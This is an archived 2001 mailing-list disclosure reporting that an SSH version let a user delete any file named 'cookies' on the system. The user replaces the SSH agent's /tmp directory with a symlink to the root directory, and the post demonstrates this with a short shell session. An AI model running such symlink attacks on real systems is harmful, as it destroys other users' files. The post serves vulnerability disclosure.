Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY LINKS NEWS MAN DOCUMENTATION

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Date: Mon, 4 Jun 2001 22:14:29 +1200 (NZST)
From: [email protected]
To: [email protected]
Subject: SSH allows deletion of other users files...

SSH allows deletion of other users files.


You can delete any file on the filesystem you want...

as long as its called cookies.


Not really a very useful bug, but could cause annoyances to
people who actually like their cookies.

 /home/zen/.netscape/cookies

sample exploit:-

 [root@clarity /root]# touch /cookies;ls /cookies
 /cookies
 [root@clarity /root]# ssh zen@localhost
 zen@localhost's password:
 Last login: Mon Jun  4 20:22:39 2001 from localhost.local
 Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
 [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
 [zen@clarity zen]$ logout
 Connection to localhost closed.
 [root@clarity /root]# ls /cookies
 /bin/ls: /cookies: No such file or directory


--zen-parse

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Партнёры:

Хостинг: